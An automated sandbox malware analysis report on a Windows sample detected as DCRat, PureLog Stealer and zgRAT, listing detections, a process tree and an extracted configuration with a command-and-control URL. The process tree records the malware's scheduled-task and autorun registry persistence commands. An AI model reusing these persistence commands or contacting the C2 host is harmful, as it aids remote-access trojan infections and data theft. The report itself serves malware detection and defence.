Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
7aHY4r6vXR.exe

Overview

General Information

Sample name:7aHY4r6vXR.exe
renamed because original name is a hash value
Original sample name:ccd01051f9e8bf3301b3bdd406f0bc24.exe
Analysis ID:1587305
MD5:ccd01051f9e8bf3301b3bdd406f0bc24
SHA1:4e9f71953bd348261e9342f7dd230f274d808e4a
SHA256:4fa025632546c9a5c346cde16c86c5d129d8381ace82e1a7d59ca865f948c533
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops PE files to the user root directory
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 7aHY4r6vXR.exe (PID: 6596 cmdline: "C:\Users\user\Desktop\7aHY4r6vXR.exe" MD5: CCD01051F9E8BF3301B3BDD406F0BC24)
    • wscript.exe (PID: 1460 cmdline: "C:\Windows\System32\WScript.exe" "C:\ChainBroker\WiJ0Q2cIafyWfcOMJ8mrmlFuDvVbi9nZIDl7gyLiG4eFyDELulT2kNl2MWww.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 3192 cmdline: C:\Windows\system32\cmd.exe /c ""C:\ChainBroker\IrbV6YakyWCvQIuALcoa2IhBwWZ19ItpwUlqov7vyFBfFx5s16nM.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • bridgeServerFontSavesMonitor.exe (PID: 6996 cmdline: "C:\ChainBroker/bridgeServerFontSavesMonitor.exe" MD5: 39953ACD4FD32884E6CAD0D1E4688051)
          • schtasks.exe (PID: 6632 cmdline: schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOwS" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Local Settings\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1748 cmdline: schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOw" /sc ONLOGON /tr "'C:\Users\Default User\Local Settings\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1196 cmdline: schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOwS" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\Local Settings\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • csc.exe (PID: 732 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\axeflxig\axeflxig.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • conhost.exe (PID: 3620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cvtres.exe (PID: 4900 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES69DB.tmp" "c:\Windows\System32\CSCAAFDA77B4B0340CF902F598B7E2DA6.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • schtasks.exe (PID: 1860 cmdline: schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOwS" /sc MINUTE /mo 6 /tr "'C:\Windows\Migration\WTR\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5004 cmdline: schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOw" /sc ONLOGON /tr "'C:\Windows\Migration\WTR\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6308 cmdline: schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOwS" /sc MINUTE /mo 14 /tr "'C:\Windows\Migration\WTR\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6632 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Windows\SchCache\RuntimeBroker.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5772 cmdline: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\SchCache\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3452 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Windows\SchCache\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6020 cmdline: schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOwS" /sc MINUTE /mo 13 /tr "'C:\Windows\assembly\GAC_32\System.Data.OracleClient\2.0.0.0__b77a5c561934e089\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3084 cmdline: schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOw" /sc ONLOGON /tr "'C:\Windows\assembly\GAC_32\System.Data.OracleClient\2.0.0.0__b77a5c561934e089\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6592 cmdline: schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOwS" /sc MINUTE /mo 13 /tr "'C:\Windows\assembly\GAC_32\System.Data.OracleClient\2.0.0.0__b77a5c561934e089\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2920 cmdline: schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOwS" /sc MINUTE /mo 7 /tr "'C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4520 cmdline: schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOw" /sc ONLOGON /tr "'C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1748 cmdline: schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOwS" /sc MINUTE /mo 6 /tr "'C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6016 cmdline: schtasks.exe /create /tn "bridgeServerFontSavesMonitorb" /sc MINUTE /mo 9 /tr "'C:\ChainBroker\bridgeServerFontSavesMonitor.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6020 cmdline: schtasks.exe /create /tn "bridgeServerFontSavesMonitor" /sc ONLOGON /tr "'C:\ChainBroker\bridgeServerFontSavesMonitor.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6644 cmdline: schtasks.exe /create /tn "bridgeServerFontSavesMonitorb" /sc MINUTE /mo 7 /tr "'C:\ChainBroker\bridgeServerFontSavesMonitor.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • cmd.exe (PID: 6016 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\FeErzF7oGb.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 7216 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • w32tm.exe (PID: 7240 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
            • SfLAFHFXIbHzHGgilQgXtKOw.exe (PID: 7576 cmdline: "C:\Users\Default User\Local Settings\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe" MD5: 39953ACD4FD32884E6CAD0D1E4688051)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://506691cm.renyash.ru/vmpoll", "MUTEX": "DCR_MUTEX-ir7LGSrsk71YAT4WpA4X", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
7aHY4r6vXR.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    7aHY4r6vXR.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Windows\SchCache\RuntimeBroker.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Windows\SchCache\RuntimeBroker.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                Click to see the 7 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000000.00000003.1734834073.0000000006F18000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  00000004.00000000.1794524656.0000000000CA2000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    00000000.00000003.1735483300.00000000058B1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      00000004.00000002.1854260219.000000001321B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                        Process Memory Space: bridgeServerFontSavesMonitor.exe PID: 6996JoeSecurity_DCRat_1Yara detected DCRatJoe Security

                          Unpacked PEs

                          SourceRuleDescriptionAuthorStrings
                          4.0.bridgeServerFontSavesMonitor.exe.ca0000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            4.0.bridgeServerFontSavesMonitor.exe.ca0000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                              0.3.7aHY4r6vXR.exe.58ff717.1.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                0.3.7aHY4r6vXR.exe.58ff717.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                                  0.3.7aHY4r6vXR.exe.6f66717.0.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                    Click to see the 5 entries

                                    Sigma Signatures

                                    System Summary

                                    barindex
                                    Sigma detected: Execution from Suspicious Folder
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Default User\Local Settings\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe" , CommandLine: "C:\Users\Default User\Local Settings\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe, NewProcessName: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe, OriginalFileName: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\FeErzF7oGb.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6016, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Users\Default User\Local Settings\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe" , ProcessId: 7576, ProcessName: SfLAFHFXIbHzHGgilQgXtKOw.exe
                                    Sigma detected: Files With System Process Name In Unsuspected Locations
                                    Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ChainBroker\bridgeServerFontSavesMonitor.exe, ProcessId: 6996, TargetFilename: C:\Windows\SchCache\RuntimeBroker.exe
                                    Sigma detected: CurrentVersion Autorun Keys Modification
                                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\Default User\Local Settings\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe", EventID: 13, EventType: SetValue, Image: C:\ChainBroker\bridgeServerFontSavesMonitor.exe, ProcessId: 6996, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SfLAFHFXIbHzHGgilQgXtKOw
                                    Sigma detected: CurrentVersion NT Autorun Keys Modification
                                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Users\Default User\Local Settings\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe", EventID: 13, EventType: SetValue, Image: C:\ChainBroker\bridgeServerFontSavesMonitor.exe, ProcessId: 6996, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                                    Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\axeflxig\axeflxig.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\axeflxig\axeflxig.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\ChainBroker/bridgeServerFontSavesMonitor.exe", ParentImage: C:\ChainBroker\bridgeServerFontSavesMonitor.exe, ParentProcessId: 6996, ParentProcessName: bridgeServerFontSavesMonitor.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\axeflxig\axeflxig.cmdline", ProcessId: 732, ProcessName: csc.exe
                                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\ChainBroker\WiJ0Q2cIafyWfcOMJ8mrmlFuDvVbi9nZIDl7gyLiG4eFyDELulT2kNl2MWww.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\ChainBroker\WiJ0Q2cIafyWfcOMJ8mrmlFuDvVbi9nZIDl7gyLiG4eFyDELulT2kNl2MWww.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\7aHY4r6vXR.exe", ParentImage: C:\Users\user\Desktop\7aHY4r6vXR.exe, ParentProcessId: 6596, ParentProcessName: 7aHY4r6vXR.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\ChainBroker\WiJ0Q2cIafyWfcOMJ8mrmlFuDvVbi9nZIDl7gyLiG4eFyDELulT2kNl2MWww.vbe" , ProcessId: 1460, ProcessName: wscript.exe
                                    Sigma detected: Dynamic CSharp Compile Artefact
                                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\ChainBroker\bridgeServerFontSavesMonitor.exe, ProcessId: 6996, TargetFilename: C:\Users\user\AppData\Local\Temp\axeflxig\axeflxig.cmdline

                                    Data Obfuscation

                                    barindex
                                    Sigma detected: Dot net compiler compiles file from suspicious location
                                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\axeflxig\axeflxig.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\axeflxig\axeflxig.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\ChainBroker/bridgeServerFontSavesMonitor.exe", ParentImage: C:\ChainBroker\bridgeServerFontSavesMonitor.exe, ParentProcessId: 6996, ParentProcessName: bridgeServerFontSavesMonitor.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\axeflxig\axeflxig.cmdline", ProcessId: 732, ProcessName: csc.exe

                                    Persistence and Installation Behavior

                                    barindex
                                    Sigma detected: Schedule system process
                                    Source: Process startedAuthor: Joe Security: Data: Command: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Windows\SchCache\RuntimeBroker.exe'" /f, CommandLine: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Windows\SchCache\RuntimeBroker.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\ChainBroker/bridgeServerFontSavesMonitor.exe", ParentImage: C:\ChainBroker\bridgeServerFontSavesMonitor.exe, ParentProcessId: 6996, ParentProcessName: bridgeServerFontSavesMonitor.exe, ProcessCommandLine: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Windows\SchCache\RuntimeBroker.exe'" /f, ProcessId: 6632, ProcessName: schtasks.exe

                                    Suricata Signatures

                                    No Suricata rule has matched

                                    Joe Sandbox Signatures

                                    Click to jump to signature section

                                    Show All Signature Results

                                    AV Detection

                                    barindex
                                    Antivirus / Scanner detection for submitted sample
                                    Source: 7aHY4r6vXR.exeAvira: detected
                                    Antivirus detection for dropped file
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeAvira: detection malicious, Label: HEUR/AGEN.1339906
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeAvira: detection malicious, Label: HEUR/AGEN.1339906
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeAvira: detection malicious, Label: HEUR/AGEN.1339906
                                    Source: C:\ChainBroker\WiJ0Q2cIafyWfcOMJ8mrmlFuDvVbi9nZIDl7gyLiG4eFyDELulT2kNl2MWww.vbeAvira: detection malicious, Label: VBS/Runner.VPG
                                    Source: C:\Users\user\Desktop\ARUSTYfT.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeAvira: detection malicious, Label: HEUR/AGEN.1339906
                                    Source: C:\Users\user\Desktop\riACjval.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                    Source: C:\Users\user\AppData\Local\Temp\FeErzF7oGb.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeAvira: detection malicious, Label: HEUR/AGEN.1339906
                                    Source: C:\Windows\SchCache\RuntimeBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1339906
                                    Found malware configuration
                                    Source: 00000004.00000002.1854260219.000000001321B000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://506691cm.renyash.ru/vmpoll", "MUTEX": "DCR_MUTEX-ir7LGSrsk71YAT4WpA4X", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                                    Multi AV Scanner detection for dropped file
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeReversingLabs: Detection: 83%
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeVirustotal: Detection: 59%Perma Link
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeReversingLabs: Detection: 83%
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeVirustotal: Detection: 59%Perma Link
                                    Source: C:\Users\user\Desktop\ARUSTYfT.logReversingLabs: Detection: 70%
                                    Source: C:\Users\user\Desktop\ARUSTYfT.logVirustotal: Detection: 69%Perma Link
                                    Source: C:\Users\user\Desktop\VObntHLa.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\VObntHLa.logVirustotal: Detection: 34%Perma Link
                                    Source: C:\Users\user\Desktop\hzhmzTUD.logVirustotal: Detection: 10%Perma Link
                                    Source: C:\Users\user\Desktop\riACjval.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeReversingLabs: Detection: 83%
                                    Source: C:\Windows\Migration\WTR\SfLAFHFXIbHzHGgilQgXtKOw.exeReversingLabs: Detection: 83%
                                    Source: C:\Windows\SchCache\RuntimeBroker.exeReversingLabs: Detection: 83%
                                    Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\2.0.0.0__b77a5c561934e089\SfLAFHFXIbHzHGgilQgXtKOw.exeReversingLabs: Detection: 83%
                                    Multi AV Scanner detection for submitted file
                                    Source: 7aHY4r6vXR.exeVirustotal: Detection: 48%Perma Link
                                    Source: 7aHY4r6vXR.exeReversingLabs: Detection: 65%
                                    AI detected suspicious sample
                                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.7% probability
                                    Machine Learning detection for dropped file
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\hzhmzTUD.logJoe Sandbox ML: detected
                                    Source: C:\Windows\System32\SecurityHealthSystray.exeJoe Sandbox ML: detected
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeJoe Sandbox ML: detected
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\ARUSTYfT.logJoe Sandbox ML: detected
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeJoe Sandbox ML: detected
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeJoe Sandbox ML: detected
                                    Source: C:\Windows\SchCache\RuntimeBroker.exeJoe Sandbox ML: detected
                                    Machine Learning detection for sample
                                    Source: 7aHY4r6vXR.exeJoe Sandbox ML: detected
                                    Sample uses string decryption to hide its real strings
                                    Source: 00000004.00000002.1854260219.000000001321B000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-ir7LGSrsk71YAT4WpA4X","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVW93WTI1V2JFbHBkMmxQUTBrMlNXNVNlV1JYVldsTVEwazFTV3B2YVdSSVNqRmFVMGx6U1dwRmQwbHFiMmxrU0VveFdsTkpjMGxxUlhoSmFtOXBaRWhLTVZwVFNYTkpha1Y1U1dwdmFXUklTakZhVTBselNXcEZla2xxYjJsa1NFb3hXbE5KYzBscVJUQkphbTlwWkVoS01WcFRTamtpWFE9PSJd"]
                                    Source: 00000004.00000002.1854260219.000000001321B000.00000004.00000800.00020000.00000000.sdmpString decryptor: [["http://506691cm.renyash.ru/","vmpoll"]]
                                    Source: 7aHY4r6vXR.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: 7aHY4r6vXR.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 7aHY4r6vXR.exe
                                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\axeflxig\axeflxig.pdb source: bridgeServerFontSavesMonitor.exe, 00000004.00000002.1849804431.000000000393F000.00000004.00000800.00020000.00000000.sdmp

                                    Spreading

                                    barindex
                                    Infects executable files (exe, dll, sys, html)
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
